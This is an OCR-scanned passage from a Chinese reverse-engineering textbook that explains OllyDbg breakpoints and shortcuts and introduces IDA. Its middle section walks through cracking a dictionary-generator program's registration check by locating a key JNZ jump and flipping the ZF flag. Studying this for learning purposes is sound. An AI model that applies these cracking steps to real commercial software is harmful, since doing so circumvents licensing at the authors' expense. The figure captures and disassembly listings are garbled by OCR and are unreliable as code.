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的 结构 类 似 于 栈 的 结构 ， 都 是 由 高 往 低 方向 延伸 。 在 调用 栈 窗 口中 越 靠 下 的 函数 ， 其 栈 地 址 
越 高 ， 函 数 之 间 的 调用 关系 也 是 由 下 往 上 的 。 

(3)“ 断 点 ”窗口 

“ 断 点 ”窗口 显示 了 设置 的 所 有 的 软 断 点 ， 如 图 5-11 所 示 。 
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图 5-11 “ 断 点 ”窗口 


从 图 5-11 中 可 以 看 出 ， 设 定 了 3 条 软 断 点 ， 设 置 断 点 的 地 址 从 图 5-11 的 第 1 列 可 以 查 
看 。 如 果 在 API 函数 的 首 地 址 上 设 定 断 点 ， 那 么 在 地 址 后 会 给 出 API 函数 的 名 称 。 设 置 好 的 
断 点 如 果 不 想 使 用 ， 可 以 进行 删除 ， 如 果 暂 时 不 想 使 用 ， 则 可 以 通过 使 用 空格 键 来 切换 其 是 
否 激活 的 状态 。 

4. 常用 断 点 的 设置 方法 

在 OD 中 ， 常 用 的 设置 断 点 的 方法 有 命令 法 、 菜 单 法 和 快捷 键 法 。 无 论 通过 哪 种 方法 设 
置 断 点 ， 其 实 断 点 的 类 型 不 外 乎 有 3 种 ， 分 别 是 INT3 断 点 、 内 存 断 点 和 硬件 断 点 。 

1) 通过 命令 设置 断 点 。 

通过 命令 可 以 设置 硬件 断 点 和 INT3 断 点 。 设 置 INT3 断 点 的 方法 较为 简单 ， 直 接 在 命令 
窗口 输入 “bp 断 点 地 址 ”或 “bp API 函数 名 称 ” 即 可 。 设 置 好 以 后 ， 可 以 通过 断 点 窗口 查看 
设置 好 的 断 点 。 

关于 硬件 断 点 ， 这 里 介绍 4 条 命令 ， 有 具体 如 下 。 

G) hr: 硬件 读 断 点 ， 如 hr 断 点 地 址 。 

@ hw: 硬件 写 断 点 ， 如 hw 断 点 地 址 。 

(3) he: 硬件 执行 断 点 ， 如 he 断 点 地 址 。 

@ hd: 删除 硬件 断 点 ， 如 hd 断 点 地 址 。 

硬件 断 点 最 多 只 能 设置 4 个 ， 这 是 跟 CPU 相关 的 。 可 以 用 于 设置 断 点 的 调试 寄存 器 只 
有 4 个 , 分 别 是 DR0、DR1、DR2 和 DR3。 通 过 命令 设置 好 硬件 断 点 后 ， 可 以 在 菜单 的 “ 调 
试 (D)” 项 中 打开 “硬件 断 点 (H)”， 查看 设置 好 的 硬件 断 点 ， 如 图 5-12 所 示 。 

2) 通过 快捷 键 设置 断 点 。 

通过 快捷 键 设置 断 点 的 方法 非常 简单 ， 在 需要 设置 断 点 的 代码 行 处 按 下 F2 键 即 可 设置 
一 个 INT3 断 点 ， 在 设置 好 的 INT3 断 点 处 再 次 按 下 F2 键 即 可 取消 设置 好 的 断 点 。 

除了 可 以 在 代码 处 通过 F2 键 设置 断 点 外 ， 还 可 以 在 内 存 窗 口中 ， 在 指定 的 节 上 按 下 F2 
键 来 设置 断 点 。 这 里 设置 的 断 点 是 一 次 性 断 点 ， 即 断 点 被 触发 后 设置 的 断 点 自动 被 删除 。 

3) 通过 菜单 设置 断 点 。 

通过 菜单 设置 断 点 的 方法 比较 简单 ， 如 图 5-13 所 示 。 

在 菜单 中 可 以 看 到 设置 内 存 断 点 的 选项 ,分别 是 “内 存 访 问 ” 和 “内 存 写 入 ” 内存 断 点 
通常 对 数据 部 分 设置 断 点 ， 如 果 要 找到 某 块 内 存 中 数据 是 由 哪 块 代码 进行 处 理 的 ， 通 过 设置 
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内 存 断 点 可 以 很 容易 找到 。 
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图 5-12 硬件 断 点 图 5-13 通过 菜单 设置 断 点 


对 于 动态 调试 分 析 来 说 ， 合 理 设置 断 点 非常 重要 。 在 OD 中 ， 有 很 多 设置 断 点 的 方法 和 


技巧 ， 请 读者 在 使 用 和 学 习 的 过 程 中 慢 慢 学 习 和 摸索 。 


5. OD 调试 快捷 键 

前 面 熟悉 了 OD 的 常用 功能 ， 最 后 简单 介绍 OD 调试 中 用 到 的 一 些 快捷 键 。 

Q@ F8 键 : 单 步 步 过 ， 依 次 执行 每 一 条 代码 ， 遇 到 CALL 不 进入 ， 遇 到 REP 不 重复 。 
@ F7 键 : 单 步 步 入 ， 依 次 执行 每 一 条 代码 ， 遇 到 CALL 则 进入 ， 遇 到 REP 则 重复 。 
@ F4 键 : 执行 到 功能 的 代码 处 《前提 条 件 是 选中 的 代码 在 程序 的 流程 中 一 定 会 被 执行 到 )。 
由 F9 键 : 运行 程序 ， 直 到 遇 到 断 点 才 停止 。 

@ Ctrl+F9 组 合 键 : 返回 调用 处 (在 Win7 及 更 高 的 版 本 的 操作 系统 下 ， 该 快捷 键 失灵 了 )。 


@ Alt+F9 组 合 键 : 执行 到 函数 的 结尾 处 


OD 的 这 些 快捷 键 使 程序 被 执行 起 来 ， 类 似 于 第 1 章 介绍 的 VC 的 调试 功能 。 
关于 OD 调试 器 的 使 用 就 介绍 到 这 里 ， 在 后 面 的 章节 中 仍然 会 介绍 关于 调试 器 和 调试 的 


更 深入 的 知识 。 
5.2.2 ”OD 破解 实例 


为 了 更 好 地 掌握 OD 的 使 用 ， 这 里 介绍 一 个 简单 的 程序 破解 。 这 里 介绍 的 软件 破解 的 知 


识 属于 最 基础 的 知识 ， 目 的 在 于 掌握 OD 的 
使 用 ， 而 不 是 为 了 践踏 别人 的 劳动 成 果 。 

1， 对 字典 生成 器 的 破解 

前 面 介绍 了 汇编 语言 及 OD 调试 器 ， 现 
在 通过 OD 调试 器 破解 一 个 简单 的 应 用 程序 。 
破解 的 应 用 程序 是 第 2 章 介绍 密码 暴力 破解 
程序 时 用 来 生成 密码 字典 的 软件 。 软 件 界 面 
如 图 5-14 所 示 。 

从 图 5-14 中 的 标题 栏 部 分 可 以 看 出 , 该 
软件 是 未 注册 的 ， 在 软件 的 下 方 需要 输入 注 
册 密 码 进行 注册 。 在 未 注册 的 情况 下 ， 该 软 





图 5-14 字典 生成 工具 








5.2 ”逆向 调试 分 析 工 具 





件 的 部 分 功能 是 无 法 使 用 的 。 现 在 来 学 习 如 何 破解 该 软件 达到 注册 的 目的 ， 从 而 更 好 地 掌握 
关于 OD 的 使 用 。 

首先 对 该 软件 进行 查 壳 (关于 查 壳 的 知识 , 在 后 面 的 章节 进行 介绍 ), 发 现 该 软件 没有 加 
壳 。 然 后 用 OD 加 载 该 软件 ， 准 备 对 其 进行 调试 分 析 ， 从 而 进行 破解 。OD 载 入 该 软件 后 的 
界面 如 图 5-15 所 示 。 


是 S000 
ebp, esp | X O12FFBY 
4 | % TCO2ES1N ntoll .WiFavtsyts 
BOASAFBS | % FEFDENYN 
DBuTEERC 
eax, dword ptr Fs:[0] 


eax | 0 
dword ptr fs:[0], esp | D1 7298922 Htdli .FLOM 
SP 。 5 全 | 


MFFFFEFFF) 
Danaal 
kerne132 .Getuersion 





[5 
meri Fs 2b n3 py 98 28 41 GN,BD sR hi 





图 5-15 OD 载 入 程序 后 的 界面 


一 般 情况 下 ， 使 用 OD 载 入 程序 后 ，OD 都 会 使 程序 停止 在 它 的 入 口 代码 处 。 从 图 5-15 中 
的 反 汇 编 窗口 可 以 看 出 ， 程 序 停 在 了 地 址 为 0041A92D 处 。 在 寄存 器 窗口 中 可 以 看 出 ， 目 前 
的 EIP 为 0041A92D。EIP 寄存 器 始终 指向 将 要 执行 的 代码 的 地 址 ， 并 自动 更 新 到 下 一 条 要 执 
行 的 代码 地 址 处 。 

从 图 5-14 中 的 标题 栏 可 以 看 出 ， 软 件 是 未 注册 版 的 。 如 果 软 件 是 注册 表 的 话 ， 那 么 标 
题 栏 处 的 文本 必然 不 会 再 显示 “未 注册 ”字样 。 这 
里 通过 搜索 字符 串 的 方式 来 查找 需要 的 信息 。 在 | wo， 
图 5-15 的 反 汇 编 窗 口上 单 击 鼠 标 右键 ， 在 弹出 的 
右键 菜单 中 选择 “Ultra String Reference” 一 “Find 
UNICODE”， 如 图 5-16 所 示 。 

“Ultra String Reference” 菜 单 是 一 个 插件 ， 它 
是 一 款 字 符 串 搜索 工具 。 几 乎 所 有 使 用 OD 的 人 都 
在 使 用 该 插件 ， 它 已 经 成 为 OD 的 基本 插件 之 一 ， 
单 击 “Find UNICODE” 后 出 现 图 5-17 所 示 的 字符 
串 窗 口 。 图 5-16 字符 串 搜索 

在 字符 串 引 用 窗口 查找 “ 易 优 软件 一 超级 字典 生成 器 3.2( 未 注册 )” 字 符 串 ， 如 图 5-18 
所 示 。 

从 图 5-18 中 可 以 看 出 ,找到 了 未 注册 情况 下 的 字符 串 ， 同 时 也 找到 了 已 注册 情况 下 的 字 
符 串 。 双 击 已 注册 字样 的 字符 串 ， 出 现 图 5-19 所 示 的 反 汇 编 窗 口 界面 。 
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| pih 
CO012580 pus 
GOAL23e8) ps 
994728EE| pas cd42509 
1098413838 peas oe 














Oat42140 
D04022E53 | posh Dos422F4 
L40301€ | push 004421F9 
C0403027 | gush O04421EC 
I0403038 | push D9442154 

















PE 3 er 
VO04034F5|mov dwxord ptr lespt2C], O0442L7S | 革 主 宇 耸 
O0040351€|mov dvord prr fespt201,00442170 | 全 定义 E 到 





图 5-18 ”查找 到 的 字符 串 





vosF | . 68 9F949899 push 49F 
UNuVA194 | 。 BBCE | mou ecx, esi 
W196 | 。 ES 23hBB289 a 09u2DCBE 
Matt | 。 SBC8 ,MOY eCcx, eax 
WO | ES 7EAD8289 BoA2DF28 | EL 

G4831A2 | 5 “1 声优 软件 -超级 字典 步 成 器 吧 - 开 《已 福 册 )” 
PAunTiNn7 ，-。E9 9E838099 jnp RnB3nBR 

istnE | 6f 98 | pusn 世 | 

NASHAiNf  。 68 528490860 push 2 

Bow HT BBCE Gu ecx, esi | 

Ba . ES 8468200 王 加 SBSnu2DCBE 


图 5-19 字符 串 对 应 的 反 汇 编 窗 口 





在 图 5-19 中 可 以 看 到 , 地 址 004031A2 处 是 一 条 PUSH 指令 , 该 PUSH 指令 将 字符 串 的 地 
址 送 入 了 堆栈 。 第 1 章 中 介绍 过 , 要 改变 窗口 标题 栏 的 文字 , 就 要 调用 API 函数 SetWindowText()， 
而 该 函数 有 两 个 参数 ， 在 汇编 的 方式 下 调用 函数 ， 函 数 的 参数 通常 是 靠 堆栈 进行 传递 的 。 
004031A7 地 址 处 是 一 条 JMP 指令 ， 也 就 是 在 PUSH 后 并 没有 调用 相应 的 函数 。 向 上 移动 反 
汇编 窗口 ， 寻 找 离 004031A2 最 近 的 一 条 条 件 跳 转 指令 并 双击 设置 断 点 ， 如 图 5-20 所 示 。 





CT eax, eax 
HONOITS2 | .~ short S88483139 
W134 eax, eax 
BHI136 | - 

MONG9139 | 





B40 1 | 
| 


B43 


W311 .| 68 A1040000 Bn 
Hauny1s9  . ,ES CBABS206 


5-20” 离 004031A2 最 近 的 一 条 条 件 跳 转 指令 





设置 好 断 点 以 后 ， 按 下 F9 键 让 软件 运行 起 来 。 软 件 成 功 地 停 在 了 设置 断 点 的 位 置 ， 即 
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0040313B 地 址 处 。 观 察 跳 转 指令 旁边 向 下 的 线 ， 变 为 红色 ， 表 示 跳 转 条 件 成 立 (在 图 5-20 
中 ，0040313B 地 址 处 右 侧 的 向 下 的 线 为 灰色 )。 在 断 点 处 按 下 回 车 键 ， 跳 转 到 JNZ 指令 的 目 
的 地 址 004031AC 处 ， 刚 好 跳 过 004031A2 地 址 处 的 PUSH 指令。JNZ 表示 在 ZF 为 0 的 情况 
下 执行 跳 转 ， 那 么 在 寄存 器 窗口 上 双击 ZF 标志 位 ， 使 其 标志 值 取 反 ， 也 就 是 由 0 变 为 1， 从 
而 使 JNZ 不 进行 跳 转 ， 可 以 执行 到 004031A2 的 PUSH 指令 。 修 改 ZF 标志 位 后 ， 按 下 F9 键 
让 程序 继续 运行 ， 这 时 软件 的 窗口 标题 栏 已 经 变 为 “已 注册 ”字样 ， 如 图 5-21 所 示 。 


税 吻 垮 软 首 -- 超 级 字 更 生成 时 V3.2 (注册 ) 





图 5-21 软件 标题 栏 已 经 变 为 “已 注册 ”字样 


这 样 ， 软 件 就 成 功 被 注册 了 ， 成 为 已 经 注册 的 版 本 ， 在 功能 上 也 没有 任何 限制 。 

2. 破解 流程 的 说 明和 整理 

这 里 使 用 的 破解 方法 称 为 暴力 破解 ， 也 就 是 通过 找到 “关键 跳 ” 来 改变 软件 的 注册 验证 
流程 ， 使 得 软件 成 为 注册 版 本 。 这 里 的 主要 目的 在 于 学 习 OD 的 使 用 , 更 进一步 学 习 关于 OD 
字符 串 搜 索 插 件 的 使 用 ,通过 字符 串 找 到 了 “关键 跳 ” 通过 修改 影响 关键 跳 的 寄存 器 改变 了 
软件 的 流程 。 其 实 ， 破 解 软件 的 方法 不 只 有 这 一 种 ， 单 纯 的 爆破 也 是 有 不 同 的 方法 的 ， 比 如 
修改 跳 转 指 令 为 无 条 件 跳 转 指令 、 修 改 影响 标志 寄存 器 的 指令 等 方法 。 

最 后 整理 一 下 该 软件 的 注册 流程 


00403134 > NBC0 sbb eax, eax 

00403136 183D8 EE sbb eaxr;, 一 十 

00403139 > BISCO test eax, eax 

0040313B 2a 3 6 jnz short 004031RAC 
0040313D . 8D4424 2C lea eax, dword ptr [esp+2C] 
00403141 : BBCE mov ecx;: esi 

0040319B PO8 moy eCcx, eax 

0040319D . E8 7EADO200 call 0042DF20 

004031A2 68 B4214400 push 004421B4 

另 优 软件 -- 超 级 字典 生成 名 v3.2 (已 注册 ) 

004031A7 E9 0E030000 jmp 004034BA 

004031AC > 6A 00 push 0 

004031AE .+ 68 52040000 push 452 

004034B0 .+ E8 6BAA0200 all 0042DF20 

004034B5 68 8C214400 push 0044218C 

: 易 优 软件 -起 级 字典 生成 器 v3.2 (未 注册 ) 

004034BA > 8B8BCE mov ecx, esi 

004034BC » E8 lcA90200 call 0042DDDD 

004034C1 . 8B96 DC070000 MOV edx, dword ptr [esi+7DC] 
004034C7 » D4C24 10 lea ecx, dword ptr [esp+10] 
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00403139 地 址 处 的 TEST 指令 是 一 条 测试 指令 ， 其 结果 会 影响 ZF 标志 位 的 状态 ， 而 
紧 接 着 TEST 指令 后 的 JNZ 指令 就 是 找到 的 关键 跳 指令 。JNZ 的 目的 地 址 是 004031AC， 如 
果 JNZ 指令 被 执行 ， 则 没有 机 会 执行 送 入 “已 注册 ”字符 串 的 PUSH 指令， 而 是 执行 了 送 
入 “未 注册 ”字符 串 的 PUSH 指令 。 最 后 004034BC 地 址 处 的 CALL 指令 调用 了 一 条 包含 
SetWindowText() 函 数 的 指令 ， 代 码 如 下 : 


TF le WA 语 S5 
Push ”已 注册 W 
i 
Push "未 注册 "; 


} 
Call SetWwindowText() 


大 致 的 流程 结构 就 是 如 此 ， 和 希望 读者 结合 前 面 学 习 的 汇编 知识 来 理解 本 部 分 的 知识 。 


5.3 ”逆向 反 汇编 分 析 工 具 


在 逆向 领域 中 ， 除 了 大 名 易 易 的 OD 以 外 ， 还 有 另 一 款 相 当 出 名 的 逆向 工具 ， 该 工具 是 
一 款 反 汇 编 工 具 ， 即 IDA。IDA 是 一 款 支 持 多 种 格式 及 处 理 器 的 反 汇 编 工 具 。 反 汇编 工具 并 
不 少见 ， 只 是 像 IDA 如 此 强大 的 反 汇 编 工 具 却 非常 少 。IDA 的 强大 在 于 它 的 交互 式 功能 ， 这 
一 点 其 实 从 它 的 名 字 中 就 可 以 看 出 。IDA 的 全 称 为 Interactive Disassembler〈 交 互 式 的 反 汇 编 
工具 )。IDA 强大 的 交互 功能 可 以 让 道 向 分 析 人 员 提 高 逆向 分 析 的 效率 。IDA 同样 可 以 像 OD 
一 样 ， 支 持 脚 本 、 插 件 来 扩展 其 分 析 功 能 。 在 病毒 分 析 、 软 件 功能 分 析 等 方面 IDA 都 能 表现 
出 了 它 的 强大 ， 当 然 具体 功能 只 有 用 过 之 后 才 知 道 。 


熟悉 IDA 界面 


这 里 略 过 安装 IDA 的 步骤 ， 它 的 安装 与 其 他 软件 的 安装 无 二 。 安 装 完 IDA 以 后 ， 安 装 
菜单 中 共有 两 个 可 以 供用 户 选择 使 用 的 软件 ,分 别 是 “IDA Pro Advanced (32-bit)” 和 “IDA Pro 
Advanced (64-bit)” 前 者 是 针对 32 位 平台 的 ， 后 者 是 针对 64 位 平台 的 。 这 里 以 32 位 平台 为 
主 来 介绍 IDA 的 使 用 。 


/py 注 : 本 书 使 用 IDA5.5 进行 介绍 ， 现 已 存在 更 高 的 版 本 。 


1. IDA 主 界面 介绍 

在 具体 了 解 IDA 之 前 ， 先 对 IDA 的 主 界面 进行 介绍 ， 如 图 5-22 所 示 。 

在 IDA 中 ， 其 各 界面 大 体 可 以 分 为 4 部 分 (其 实 相 当 多 且 复 杂 )， 分 别 是 工具 栏 、 导 航 
栏 、 首 向 工作 区 和 消息 状态 栏 。 下 面 对 各 部 分 进行 简单 介绍 。 

(1) 工具 栏 

IDA 的 工具 栏 几 乎 包含 菜单 中 的 所 有 功能 。 在 使 用 和 操作 IDA 时 ， 掌 握 工 具 栏 操作 要 比 
在 菜单 中 寻找 对 应 的 菜单 项 速度 会 提高 很 多 。 工 具 栏 如 图 5-23 所 示 。 








5.3 ”逆向 反 汇 编 分 析 工 具 














public start 
proc near 


= _STARTHPINFON ptr -1m 
dword ptr 一 3 
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工具 栏 中 的 每 项 功能 并 不 是 每 次 都 会 用 到 。 由 于 工具 栏 内 容 过 多 ， 占 用 了 整个 IDA 界面 
的 很 大 一 部 分 ， 有 时 会 影响 到 IDA 逆向 工作 区 。 为 了 关闭 工具 栏 中 不 常用 的 功能 ， 可 以 在 工 
具 栏 上 单 击 右键 ， 从 而 关闭 工具 栏 中 暂时 不 需要 的 工具 。 如 果 整 个 工具 栏 都 暂时 不 需要 ， 则 直 
接 可 以 关闭 工具 栏 。 当 再 次 需要 使 用 时 ， 可 以 通过 色 选 菜单 的 “View->ToolBars->Main ”选项 
重新 打开 工具 栏 。 无 论 是 做 开发 ， 还 是 做 逆向 分 析 而 言 ， 有 一 个 大 的 显示 器 还 是 很 享受 的 。 

(2) 导航 栏 

导航 栏 通过 不 同 的 颜色 区 分 不 同 的 内 存 属性 , 可 以 清晰 地 看 出 代码 、 数据 等 的 内 存 布局 。 





Dp 注 : 其 实 导航 栏 也 属于 工具 栏 的 一 部 分 ， 只 是 它 能 够 让 用 户 对 程序 在 宏观 分 布 上 有 一 个 总 体 了 解 。 


(3) 逆向 工作 区 

逆向 工作 区 一 般 有 7 个 子 窗口 ， 分 别 是 “Function name”“IDA View-A”“Hex View-A” 
“Structures”“Enums”“JImports ”和 “Exports”。 这 几 个 窗口 分 别 表 示 “ 函 数 名称 ”“ 反 汇编 
视图 A”“16 进 制 视图 A”“ 结 构 体 *”“ 联 合体 ”“ 导 入 数据 ”和 “导出 数据 ”。 在 逆向 分 析 时 ， 
这 些 窗 口 都 是 相当 主要 的 窗口 。 

(4) 消息 状态 栏 

消息 状态 栏 其 实 是 两 个 窗口 ， 而 不 是 一 个 窗口 。 但 是 消息 窗口 和 状态 栏 都 是 提供 消息 输 
出 或 显示 提示 功能 ， 因 此 两 个 窗口 合 在 一 起 介绍 。 消 息 窗口 主要 是 对 插件 、 脚 本 、 各 种 操作 
的 执行 情况 的 提示 。 状 态 栏 只 能 进行 简单 的 状态 提示 等 。 

2. 文件 的 打开 

IDA 的 功能 和 设置 较 多 ， 但 是 并 不 是 所 有 的 功能 一 开始 都 会 被 使 用 ， 大 部 分 的 设置 都 保 
持 默 认 即 可 。 在 介绍 和 学 习 各 种 软件 的 操作 时 ， 可 能 很 少 会 介绍 如 何 打开 一 个 文件 。 但 是 IDA 
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在 打开 文件 的 同时 会 对 文件 进行 分 析 , 在 打开 文件 时 有 两 种 方案 , 分 别 是 “ 同 导 模 式 ” 和 “一 
般 模式 ”。 

通过 菜单 “File->New” 可 以 打开 “向 导 模 式 ” 首先 出 现 的 是 “New disassembly database” 
界面 ， 如 图 5-24 所 示 。 

从 图 5-24 中 可 以 看 出 ，IDA 支持 Windows、DOS、UNIX、Mac 等 多 种 系统 平台 的 文件 
格式 。 这 里 主要 用 到 的 是 Windows 系统 平台 下 的 选项 。 在 Windows 下 ， 常 用 的 是 前 4 个 选 
项 , 分 别 是 “PE Executable”(EXE 文件 )、“PE Dynamic Library”(DLL 文件 )、“.ocx PE ActiveX 
Control”(OCX 文件 ) 和 “PE/LE/NE Device Driver”(SYS 或 VXD 文件 )。 

这 里 选择 “PE Executable”， 在 打开 的 对 话 框 中 随便 选中 一 个 EXE 文件 ， 然 后 打开 ， 出 
现 如 图 5-25 所 示 的 装载 向 导 窗 口 。 选 中 “Analysis options” 复 选 框 ， 这 是 告诉 IDA 要 手动 设 
置 “分 析 选 项 *。 如 果 不 需 要 手动 设置 ， 那 么 可 以 不 色 选 该 复 选 框 。 单 击 “ 下 一 步 ” 按 钮 ， 继 
续 设 置 装载 向 导 界 面 ， 如 图 5-26 所 示 。 
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图 5-24 New disassembly database 界面 图 5-25 PE Executable file loading Wizard 界面 (一) 


在 图 5-26 界面 中 ，IDA 默认 只 勾 选 了 “Create imports segment” 复 选 框 ， 而 在 某 些 情 况 
下 ， 用 户 需 要 对 资源 也 进行 分 析 ， 因 此 这 里 勾 选 “Create resoureces segment” 复 选 框 。 单 击 
“下 一 步 ” 按 钮 后 ， 继 续 显 示 一 个 设置 向 导 界 面 ， 如 图 5-27 所 示 。 
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图 5-26 PE Executable file loading Wizard 界面 (二) 图 5-27 PE Executable file loading Wizard 界面 (三) 


5-27 显示 的 选项 特别 多 。 从 界面 的 顶部 可 以 看 出 ， 该 部 分 属于 “Kernel Options”( 核 








5.3 ”逆向 反 汇 编 分 析 工 具 








心 选 项 )。 在 众多 选项 中 ， 只 有 靠 下 的 一 个 选项 “Coagulate data segments in the final pass” 没 





有 选中 , 其 功能 是 允许 IDA 尝试 将 数据 段 中 未 分 析 ”we ， 第 

的 自己 转换 为 数组 , 这 里 建议 不 要 选中 它 。 单 击 “下 音 

一 步 ” 按 钮 ， 出 现 如 图 5-28 所 示 的 界面 。 
图 5-28 显示 的 界面 是 用 来 设置 处 理 器 的 选项 ， 这 

即 界面 顶部 的 “PC Processer Options”。 该 部 分 也 默 全 人 吕 

认 即 可 。 单 击 “ 下 一 步 ”按钮 ， 则 出 现 装载 向 导 的 ee 基 

最 后 一 步 ， 如 图 5-29 所 示 。 Ee 而 
在 图 5-29 中 ，IDA 默认 勾 选 了 “Start analysis Te 到 Sey 


now” 复 选 框 。 单 击 “ 完 成 ”按钮 后 ， 即 刻 开始 进 2 i 
行 分 析 ， 然 后 依据 分 析 文 件 的 大 小 开始 等 待 IDA 文 
件 进行 文件 的 分 析 。 如 果 不 勾 选 “Start analysis now” 
复 选 框 ，IDA 则 不 会 马上 进行 分 析 ， 则 打开 文件 的 速度 会 稍 快 些 。 当 需要 进行 分 析 时 ， 可 以 通过 
IDA 的 菜单 依次 选择 “Options 一 Generel”， 出 现 图 5-30 所 示 的 设置 界面 。 选 中 “Enabled” 复 
选 框 ， 然 后 单 击 “Reanalyze program” 按 钮 ， 最 后 单 击 “OK ”按钮 即 可 让 IDA 对 程序 进行 
分 析 。 到 此 ，IDA 通过 “向 导 模 式 ” 打 开 文 件 的 所 有 步骤 就 完成 了 。 


IDA Options > vi Rk Xl 
Disassembly Anabsis | Crassieferences | Stings | Browser | Giraph | Mi | 





图 5-28 ”PE Executable file loading Wizard 界面 〈 四 ) 
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图 5-29 PE Executable file loading Wizard 界面 (五 ) 图 5-30”IDA Options 界面 


/Dy 注 : 如 果 在 图 5-25 中 不 选择 “Analysis options” 的 话 ， 将 不 会 出 现 图 5-27 和 图 5-28 所 示 的 两 个 设置 
界面 。 在 上 面 的 操作 步骤 中 ， 并 没有 改变 图 5-27 和 图 5-28 所 示 的 界面 中 的 选项 ， 那 么 完全 可 以 在 图 5-25 
中 不 选择 “Analysis options” 选 项 。 这 里 选中 它 的 目的 是 为 了 展示 IDA 在 装载 文件 时 功能 选项 的 强大 。 


上 面 介 绍 了 用 IDA 的 “向 导 模 式 ” 打 开 一 个 待 分 析 的 程序 ， 接 下 来 介绍 使 用 IDA 通过 
“一 般 模 式 ” 打 开 文 件 的 方式 。 

在 IDA 的 菜单 栏 上 依次 单 击 “File 一 Open” 弹出 常见 的 打开 文件 的 通用 对 话 框 ,供用 户 
选择 准备 进行 反 汇 编 分 析 的 程序 。 当 用 户 选 中 一 个 要 反 汇 编 分 析 的 程序 后 ， 会 出 现 如 图 5-31 
所 示 的 “Load a new file” 窗 口 。 
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一 般 打 开 方 式 中 ， 把 很 多 设置 集成 到 一 个 界面 中 。 在 图 5-31 中 的 “Options” 选 项 组 中 ， 
IDA 默认 选中 了 “Rename DLL entries” 和 “Make imports segment”， 这 两 项 是 需要 选中 的 。 
在 分 析 Win32 程序 时 ,需要 选中 “Create FLAT group”; 如 果 程 序 存在 资源 , 那么 也 要 选中 “Load 
resources”。 

“Options” 选 项 组 中 的 “Manual load” 可 以 手动 指定 装载 可 执行 文件 的 哪些 节 (Windows 
系统 下 的 可 执行 文件 是 PE 格式 的 文件 ， 它 将 程序 不 同属 性 的 数据 分 开 存 放 ， 比 如 代码 具有 
可 执行 的 属性 ， 数 据 具 有 可 读 写 的 属性 等 )。 

图 5-31 中 的 其 他 选项 可 以 保持 默认 ， 然 后 单 击 “OK ”按钮 ，IDA 则 开始 对 程序 进行 装 
载 和 分 析 。 

至 此 ， 关 于 IDA 打开 文件 的 部 分 就 介绍 完了 。 

3. 反 汇 编 窗 口 

在 进行 逆向 分 析 时 ， 主 要 使 用 的 窗口 还 是 反 汇 编 窗口 。 要 了 解 程序 的 内 部 工作 原理 及 流 
程 结构 ， 还 是 需要 通过 阅读 和 分 析 反 汇编 窗口 中 的 反 汇 编 代 码 。 反 汇编 窗口 如 图 5-32 所 示 。 








HerVawA | 文 雇 Shuciw el By 
sid 

Sy We r [ecx], 55m: 

jnz Short ec ; T9973DA 

MOVZX qt [ecx*+18h] 




















sport eat 

eax，296h 

Short loc 10073DF 

oe 189730DA: 7 CODE XREF: start*+161j 
3 Start4+29f .-. 






Tebp+vwar_15]。ebx 
Short t loc_1007496 


DF 
BO73D0F Toc 18873DF: 7 CODE XREF: start*383j 


*"* .text:818873DF cmp dword ptr [ecx +Buh] ， HEh 
~ text:010073E6 jbe i 党 c_19973DA 
# 党 816973E8 xor gax, 
3 0973EA cmp ne Bh], ebx 
| ee 沁 910073F9 jmp Short loc 18074060 
-text :818873F2 >- en we Sit 
| err: Dr ne 007A 





5-31 IDA 加 载 新 文件 的 窗口 图 5-32 IDA 反 汇 编 窗口 


图 5-32 中 的 最 上 面 有 一 排 选项 卡 ， 反 汇编 窗口 是 “IDA View-A” 一 项 。 该 选项 卡 的 意思 
是 “交互 式 反 汇编 视图 A”， 其 中 “A” 代 表 一 个 序号 ， 意 味 着 还 可 能 存在 “B”“C” 和 “D” 
等 多 个 反 汇编 视图 。 通 过 在 菜单 栏 中 依次 单 击 “View 一 Open subviews 一 Disassembly”， 可 以 
打开 多 个 “ 反 汇 编 视图 ”这样 的 好 处 是 ， 当 显示 器 一 屏 放 不 下 所 有 反 汇 编 代码 或 查看 的 反 汇 
编 代码 不 连续 时 ， 可 以 通过 多 个 反 汇编 视图 的 切换 来 阅读 反 汇 编 代码 。 

有 时 候 反 汇 编 代码 比较 长 ， 而 用 户 只 需要 找到 其 中 某 个 分 支 ， 如 果 以 这 样 的 代码 方式 去 
查找 ， 显 然 效率 不 高 ， 因 为 在 反 汇 编 代 码 中 可 能 存在 大 量 的 跳 转 ， 而 用 户 只 需要 针对 某 一 跳 
转 顺 序 往 下 查找 自己 的 分 支 即 可 。IDA 提供 了 一 个 非常 强大 的 功能 ， 即 将 反 汇 编 视 图 中 的 反 
汇编 代码 转换 为 流程 图 的 形式 。 在 “ 反 汇 编 视 图 ”中 按 下 空格 键 ， 即 可 将 反 汇 编 代 码 转 换 为 
“流程 图 ” 如 图 5-33 所 示 。 
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图 5-33 ”IDA 反 汇编 代 码 转 换 为 流程 图 形式 


图 5-33 的 左边 是 具体 的 流程 图 , 流程 图 的 每 个 框 中 有 当前 流程 相应 的 反 汇编 代码 块 ， 而 
右边 有 一 个 小 的 流程 图 的 宏观 图 ， 通 过 该 宏观 图 可 以 方便 地 移动 反 汇 编 流 程 图 。 

IDA 在 分 析 程序 的 过 程 中 ， 会 将 反 汇编 代码 中 相互 调用 的 情况 进行 表示 ， 它 可 以 辅助 用 
户 了 解 程序 的 引用 关系 。 图 5-32 所 示 的 反 汇 编 窗口 分 为 五 部 分 ， 最 左 侧 的 是 “程序 控制 流 ” 
线条 ， 用 来 指示 反 汇 编 代 码 中 的 跳 转 情况 ;“ 程 序 控制 流 ” 线 条 的 右 侧 是 反 汇编 代码 的 地 址 ; 
地 址 右 侧 则 是 “标号 ”或 “ 反 汇 编 代码 ”， 最 右 
边 是 反 汇编 的 注释 。 

在 注释 列 中 ， 可 能 是 分 析 人 员 自己 添加 的 
注释 ， 也 可 能 是 IDA 增加 的 注释 。 自 行 增加 注 
释 的 方法 是 将 光标 放 在 对 应 的 反 汇编 代码 行 
上 ， 然 后 按 下 “;”( 分 号 ) 键 ， 会 出 现 图 5-34 | 的 
所 示 的 添加 注释 的 界面 。 aa 

在 IDA 增加 的 注释 当中 , 最 多 的 是 函数 的 ” SR 
调用 和 交叉 引用 注释 中 以 CODE XREF: 开 头 
的 都 是 交叉 引用 )。 交 叉 引用 就 是 辅助 用 户 了 解 程序 转向 流程 的 提示 ， 如 图 5-35 所 示 。 


-text :818067382 edi ; BetHoduleHandlien 
.text:81897384 word ptr [eax], SA4Dh 
-text :810097389 short loc 199793DA 
-text:916887386 ecx，[eax+3ch] 

-text :8189873BE ecx, eax 

-text:818873C8 dword ptr [ecx], 455gh 
-text:810873C6 short loc 10873DA 
-text:89189735C8 eax, Word ptr [ecx+18h] 
